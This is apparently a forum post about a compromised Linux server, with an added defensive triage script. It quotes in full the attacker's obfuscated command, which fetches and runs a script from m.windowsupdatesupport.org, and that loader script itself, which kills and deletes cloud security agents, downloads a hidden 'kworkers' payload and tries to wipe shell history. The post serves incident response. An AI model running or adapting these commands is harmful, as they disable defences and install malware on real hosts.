A record of a Linux box being attacked (a Linux server was compromised)
The Linux server's CPU usage spiked.
top
High CPU
Check the process list:
ps -ef | grep bash
bash process information
So it runs by downloading and executing a remote script; the process cannot be killed, it feels like something is executing in an endless loop...
bash -c {echo,Y3VybCBodHRwOi8vbS53aW5kb3dzdXBkYXRlc3VwcG9ydC5vcmcvZC9sb2FkZXIuc2h8c2g=}|{base64,-d}|{bash,-i}
Decoding the base64 gives the real address of the script. (The `{echo,...}`, `{base64,-d}` and `{bash,-i}` groups are bash brace expansion, which lets the whole pipeline be written without a single space; bash expands them to `echo ... | base64 -d | bash -i`.)
echo "Y3VybCBodHRwOi8vbS53aW5kb3dzdXBkYXRlc3VwcG9ydC5vcmcvZC9sb2FkZXIuc2h8c2g="|base64 -d
curl http://m.windowsupdatesupport.org/d/loader.sh|sh
Below is the content of the script that was executed (the `#` comments are annotations added here, not part of the attacker's script; the script lines themselves are unchanged):
# Stage 1: locate cloud host-security / EDR agents by process name, delete their install
# directories and kill them (e.g. aegis = Alibaba Cloud, qcloud/barad_agent/sgagent = Tencent Cloud,
# hostguard = Huawei Cloud).
ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs dirname | xargs rm -rf
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs -I {} kill -9 {}
ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs -I {} kill -9 {}
rm -rf /usr/local/aegis
rm -rf /usr/local/qcloud
rm -rf /usr/local/hostguard/bin
# Stage 2: kill any earlier copy of its own payload, then fetch a fresh one from the C2 domain.
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs -I {} kill -9 {}
domainroota=m.windowsupdatesupport.org
# The payload is hidden in a directory named ".git": $HOME/.git by default, or ./.git if one
# exists in the current working directory.
mkdir ~/.git
mkdir ./.git
gitdir=~/.git
if [ -d ~/.git ]; then
gitdir=~/.git
fi
if [ -d ./.git ]; then
gitdir=./.git
fi
rm -fv $gitdir/.lock
curl http://$domainroota/d/kworkers -o $gitdir/kworkers
chmod 777 $gitdir/kworkers
# Inside a container the payload runs in the foreground (keeping the container alive);
# otherwise it is detached with nohup and logs to $gitdir/.log.
if [ -e /.dockerenv ]
then
$gitdir/kworkers
else
nohup $gitdir/kworkers >>$gitdir/.log&
fi
# Attempted anti-forensics: remove lines mentioning the C2 domain from the shell history.
# Because of the single quotes, $domainroota is not expanded, so the pattern is the literal
# string "$domainroota" (end-of-line anchor followed by text) and never matches; the history
# is left intact.
sed -i '/$domainroota/d' ~/.bash_history
Could some expert help interpret this? How do I get rid of this thing...
Programmers' contests are always fought so quietly.
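As an added example (editor's code, not part of the original post and not the poster's or the attacker's), here are the two triage steps a responder would want from the evidence above: decoding the `{echo,<base64>}|{base64,-d}|{bash,-i}` command line seen in `ps` to recover what was actually run, and checking for the files the posted loader drops (`<dir>/.git/kworkers` with its `.lock` and `.log`). It assumes a POSIX shell and coreutils `base64(1)`; the sample process records are constructed from the command line shown in the post, and the `/proc` walk only runs when called explicitly.

```shell
#!/bin/sh
# Editor-added triage helpers for the loader described above. Assumes POSIX sh
# plus coreutils base64(1). Nothing here kills or deletes anything.

# Extract and decode the base64 payload from a command line of the form
#   bash -c {echo,<base64>}|{base64,-d}|{bash,-i}
# Prints the decoded command; returns 1 if the line does not use that pattern.
decode_brace_payload() {
    rest=${1#*\{echo,}            # drop everything up to and including "{echo,"
    [ "$rest" != "$1" ] || return 1
    b64=${rest%%\}*}              # keep only the text before the first "}"
    [ -n "$b64" ] || return 1
    printf '%s' "$b64" | base64 -d 2>/dev/null
}

# Read "pid<TAB>cmdline" records on stdin; print "pid<TAB>decoded payload" for
# every record that carries the brace-expansion obfuscation, skip the rest.
scan_cmdline_records() {
    tab=$(printf '\t')
    while IFS="$tab" read -r pid cmd; do
        payload=$(decode_brace_payload "$cmd") || continue
        printf '%s\t%s\n' "$pid" "$payload"
    done
}

# Live variant: feed every process command line from /proc to the scanner.
# Run as root on the affected host; each hit is a PID worth preserving
# (/proc/<pid>/exe, /proc/<pid>/cwd) before it is killed.
scan_live_processes() {
    for f in /proc/[0-9]*/cmdline; do
        pid=${f#/proc/}; pid=${pid%/cmdline}
        cmd=$(tr '\0' ' ' < "$f" 2>/dev/null) || continue
        printf '%s\t%s\n' "$pid" "$cmd"
    done | scan_cmdline_records
}

# Check one directory for the artefacts the loader creates under ".git".
# The script uses $HOME and the current working directory of the process that
# ran it, so call this for both. Prints each artefact found; returns 1 if none.
check_dropper_paths() {
    found=1
    for name in kworkers .lock .log; do
        if [ -e "$1/.git/$name" ]; then
            printf '%s\n' "$1/.git/$name"
            found=0
        fi
    done
    return $found
}

# Constructed sample records (editor-made, modelled on the ps output in the
# post): one obfuscated loader invocation and one ordinary login shell.
SAMPLE_RECORDS=$(printf '%s\t%s\n' \
    4242 'bash -c {echo,Y3VybCBodHRwOi8vbS53aW5kb3dzdXBkYXRlc3VwcG9ydC5vcmcvZC9sb2FkZXIuc2h8c2g=}|{base64,-d}|{bash,-i}' \
    4243 '-bash')

# Offline demonstration on the sample records.
demo() {
    printf '%s\n' "$SAMPLE_RECORDS" | scan_cmdline_records
}

demo
```

`demo` prints one line, `4242<TAB>curl http://m.windowsupdatesupport.org/d/loader.sh|sh`, which is exactly the command the post decoded by hand. On a real host, pair `scan_live_processes` with `check_dropper_paths "$HOME"` and `check_dropper_paths` on the working directory of the compromised service. Because the loader also removes the vendor agents, the sudden absence of directories such as /usr/local/aegis or /usr/local/qcloud is itself an indicator. Whatever relaunches the loader (the "endless loop" the poster suspects) is not shown in the posted script, so scheduled tasks and the `kworkers` binary itself still need to be examined before cleanup.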